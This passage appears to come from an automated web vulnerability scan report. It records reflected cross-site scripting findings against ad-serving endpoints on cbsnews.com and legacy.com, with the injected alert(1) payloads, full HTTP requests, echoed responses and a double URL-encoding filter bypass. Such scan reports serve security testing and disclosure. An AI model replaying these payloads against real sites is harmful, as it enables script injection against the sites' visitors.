User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:52 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:36:52 GMT
Content-Length: 553

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS9d43c<a>fd7ee7a98b4&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1"
...[SNIP]...

1.203. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 59f48*/alert(1)//f3203b6ea8b was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS59f48*/alert(1)//f3203b6ea8b&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:45 GMT
Server: Apache/2.2
Content-Length: 1092
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:35:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS59f48*/alert(1)//f3203b6ea8b&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.wr
...[SNIP]...

1.204. http://mads.cbsnews.com/mac-ad [NCAT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload 62ddc*/alert(1)//5c07f31d8c0 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A62ddc*/alert(1)//5c07f31d8c0&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:25 GMT
Server: Apache/2.2
Content-Length: 1139
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:25 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A62ddc*/alert(1)//5c07f31d8c0&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.205. http://mads.cbsnews.com/mac-ad [NODE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 8af49*/alert(1)//09dcc35bef3 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=5035448af49*/alert(1)//09dcc35bef3&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:39 GMT
Server: Apache/2.2
Content-Length: 1114
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:39 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=5035448af49*/alert(1)//09dcc35bef3&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.206. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34 was submitted in the PAGESTATE parameter. This input was echoed as 420d4';alert(1)//5b6eccfcc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:21 GMT
Server: Apache/2.2
Content-Length: 1167
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PT
...[SNIP]...
den%252dUS&amp;ucat_rsi=%2526&amp;pg=&amp;t=2011.02.14.01.36.21/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />');
;window.CBSI_PAGESTATE='420d4';alert(1)//5b6eccfcc34';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw5.cnet.com::1348606272 2011.02.14.01.36.21 *//* MAC T 0.0.3.3 */

1.207. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload d6a51*/alert(1)//c1e9cd45c17 was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=d6a51*/alert(1)//c1e9cd45c17&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:23 GMT
Server: Apache/2.2
Content-Length: 1122
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:23 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=d6a51*/alert(1)//c1e9cd45c17&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default a
...[SNIP]...

1.208. http://mads.cbsnews.com/mac-ad [POS parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload c0f65<a>1fc0f8dcd22 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100c0f65<a>1fc0f8dcd22&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:35 GMT
Content-Length: 599

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100c0f65<a>1fc0f8dcd22&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80' CNET-PTYPE='00' POS='100c0f65a1fc0f8dcd22' NCAT='250:503544:' CNET-PARTNER-ID='1' DVAR_
...[SNIP]...

1.209. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload 93353*/alert(1)//10a6db2e038 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=830193353*/alert(1)//10a6db2e038&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:52 GMT
Server: Apache/2.2
Content-Length: 1116
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:52 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=830193353*/alert(1)//10a6db2e038&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.210. http://mads.cbsnews.com/mac-ad [SITE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into a JavaScript inline comment. The payload e911c*/alert(1)//dc43016cd59 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162e911c*/alert(1)//dc43016cd59&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:46 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:37:46 GMT
Content-Length: 618

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162e911c*/alert(1)//dc43016cd59&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL
...[SNIP]...

1.211. http://mads.cbsnews.com/mac-ad [SITE parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload dc004<a>c7e5ad6dad5 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162dc004<a>c7e5ad6dad5&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:24 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:36:24 GMT
Content-Length: 552

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162dc004<a>c7e5ad6dad5&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BRAND=&
...[SNIP]...

1.212. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 4e95f*/alert(1)//b34259e989e was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=14e95f*/alert(1)//b34259e989e&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:54 GMT
Server: Apache/2.2
Content-Length: 1088
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:54 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=14e95f*/alert(1)//b34259e989e&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.213. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 4d5b0*/alert(1)//4aaf1da79cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1&4d5b0*/alert(1)//4aaf1da79cd=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:12 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:12 GMT
Content-Length: 610

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1&4d5b0*/alert(1)//4aaf1da79cd=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1||;cbsnews.com;;|-1';/* MAC [r20101
...[SNIP]...

1.214. http://mads.cbsnews.com/mac-ad [x-cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 7ae8b*/alert(1)//a2655b7e480 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=915017457ae8b*/alert(1)//a2655b7e480&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:05 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:05 GMT
Content-Length: 608

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=915017457ae8b*/alert(1)//a2655b7e480&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1||;cbsnews
...[SNIP]...

1.215. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd83b"><script>alert(1)</script>a6532cd236c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframefd83b"><script>alert(1)</script>a6532cd236c/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addynfd83b"><script>alert(1)</script>a6532cd236c/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.216. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7704"><script>alert(1)</script>52919f7acc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

